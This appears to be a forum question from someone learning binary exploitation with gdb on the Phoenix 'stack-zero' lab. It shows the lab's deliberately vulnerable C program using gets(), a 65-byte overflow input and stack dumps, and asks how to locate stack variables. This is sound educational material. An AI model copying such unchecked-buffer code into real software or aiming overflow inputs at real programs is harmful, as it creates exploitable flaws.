I am learning binary exploit atm. with gdb (gef extension) and was doing the followig excersize where you are given the source code of a program and are to overwrite the changeme var with buffer overflow exploting the gets() func.:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BANNER \
"Welcome to " LEVELNAME ", brought to you by https://exploit.education"
char *gets(char *);
int main(int argc, char **argv) {
struct {
char buffer[64];
volatile int changeme;
} locals;
printf("%s\n", BANNER);
locals.changeme = 0;
gets(locals.buffer);
if (locals.changeme != 0) {
puts("Well done, the 'changeme' variable has been changed!");
} else {
puts(
"Uh oh, 'changeme' has not yet been changed. Would you like to try "
"again?");
}
exit(0);
}
The challange is easy enough once you realize you can just input a huge string. However, after analyzing the problem i found that you had to enter a string of length 65 or longer to solve the challange from which you can deduce if you analyze the stack:
run <<< $(python3 -c 'print("A"*64)') (fails)
x/64x $sp
0x7fffffffdfc0: 0xffffe108 0x00007fff 0xffffdff7 0x00000001
0x7fffffffdfd0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffdfe0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffdff0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe000: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe010: 0x00000000 0x00007fff 0x00000000 0x00000000
0x7fffffffe020: 0x555551b0 0x00005555 0xf7e1fbbb 0x00007fff
[...]
run <<< $(python3 -c 'print("A"*65)') (succeeds)
x/64x $sp
0x7fffffffdfc0: 0xffffe108 0x00007fff 0xffffdff7 0x00000001
0x7fffffffdfd0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffdfe0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffdff0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe000: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe010: 0x00000041 0x00007fff 0x00000000 0x00000000
0x7fffffffe020: 0x555551b0 0x00005555 0xf7e1fbbb 0x00007fff
[...]
That the var changeme is stored in the stack at address 0x7fffffffe010. My question is if there exists more sophisticated methods to snipe the specific location of declared vaiables in the stack.
find var changeme in stack (pseudo)
That then returns the address 0x7fffffffe010.
Thank you!
External links:
Challange site: https://exploit.education/phoenix/stack-zero/
User contributions licensed under CC BY-SA 3.0